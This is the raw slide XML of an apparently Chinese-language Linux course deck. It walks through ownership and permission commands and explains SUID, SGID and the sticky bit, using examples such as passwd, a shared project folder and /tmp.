              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> -R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>rex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> lake/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>touch land/market; touch land/math ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>chgrp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t> -R heard  land/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1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917192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may</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>touch may/live</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –R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reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> may</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>chgrp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> may</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> rock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>usermod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -g 563 rock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –R 770 may </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mv  may/ /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>reg,rock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不行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7013283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讓一般使用者在執行某些程式的時候， 能夠暫時的具有該程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>擁有者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的權限。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一般使用者可以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bin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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可修改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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，但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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的權限？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kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>讓檔案在執行時，該檔案執行時，檔案的執行身份會暫時變成該檔案的“擁有者”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600420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檔案與目錄的權限還有所謂的特殊權限存在，也就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>『 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特權</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>』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使用者若無特殊需求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不應該去開啟這些權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>避免安全方面出現嚴重漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>讓怪客入侵。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特殊權限有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SUID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及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Sticky Bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三種。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一旦設定完成就可以看到原先的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>”x”(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>執行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就會變成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>符號。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638740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UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>條件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UID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限僅對執行檔與二進位程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(binary program)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shell script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程式、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者必須需要具有可執行該程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的權限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特權時機是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>runtime(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程式執行時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>運用舉例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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bin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系統預設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bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd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:–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>rwsr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xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>提供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使用者變更密碼的二進位執行檔，目的在於變更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 (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:----------)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>內的內容，但此檔案僅有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可以讀取、編輯變更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458503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呈上頁內容所有帳號的密碼都記錄在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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案內，檔案權限為：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>『---------- 1 root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，意思是僅有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可讀且強制寫入檔案。如</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般帳號使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Stanley)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>需要修改自己的密碼，可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>『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』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>這個指令修改密碼</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為甚麼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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不能讓一般使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Stanley) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>去存取，但 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>stanley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>還能夠修改密碼檔案內的密碼呢？ 這就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的功能啦！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="0" i="0" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst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23729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593177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條件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GID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限對執行檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(binary program)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與資料夾有效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者必須需要具有可執行該程式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的權限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者在執行的過程中將會獲得該程式群組的支援。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>運用舉例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>群組公用資料夾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目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>建立一個群組公用資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>專案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在資料夾內的檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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的所屬群組會和群組公用資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>專案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相同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832822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 sz="1400" b="1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141123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目標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>建立多帳號支援同一群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Project)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與共用目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>srv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ahome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的建立！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一步建立專案帳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二步建立專案目錄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44331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三步設定專案資料夾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ahome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的所屬群組</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(project)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>及一般權限設定，並利用群組成員新增檔案，但發現檔案所屬群組與資料夾不同步。</a:t>
            </a:r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862700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四步設定特權模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(SGID)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>給專案資料夾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ahome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並確認資料夾所屬群組是否為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，並利用專案成員再開建立新檔案，結果發現檔案的所屬群組為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>及符合預期效果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559859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ticky Bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>條件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目前只針對目錄有效，對於檔案沒有效果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者對於目錄具有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>w(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>寫入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限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功能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使用者在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Sticky Bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目錄下建立檔案或目錄時，僅有自己與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>才有權力刪除該檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>運用舉例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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系統預設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tmp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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>drwxrwxrwt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功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>任何人都可在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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>內新增、修改檔案，但僅有該檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目錄建立者與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能夠刪除自己的目錄或檔案。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013260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SBIT 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僅對目錄有效，當目錄設定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 SBIT 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時，在該目錄下建立的檔案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(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或子目錄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)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，只有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 root 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及檔案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(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或子目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-TW" altLang="zh-TW" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>的擁有者可以刪除</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0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235452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Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特殊權限的設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>僅對目錄有效。也就是說</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>若您設定某個檔案具有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Sticky 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並不會產生需該檔案擁有者才能刪除該檔的作用。必須將檔案放在具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限的目錄下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>才能讓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Sticky </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>權限產生效用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13830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kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Ｌ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>inux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>下檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> SUID/SGID/SBIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>屬性設定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SUID/SGID/SBIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>的屬性同樣是用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hmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>指令設定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權限設定：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SUID = 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SGID = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SBIT = 1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7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216458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CUR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>user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sy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>userad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gy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 1777 CUR/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mv CUR/ /</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>cd CUR/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
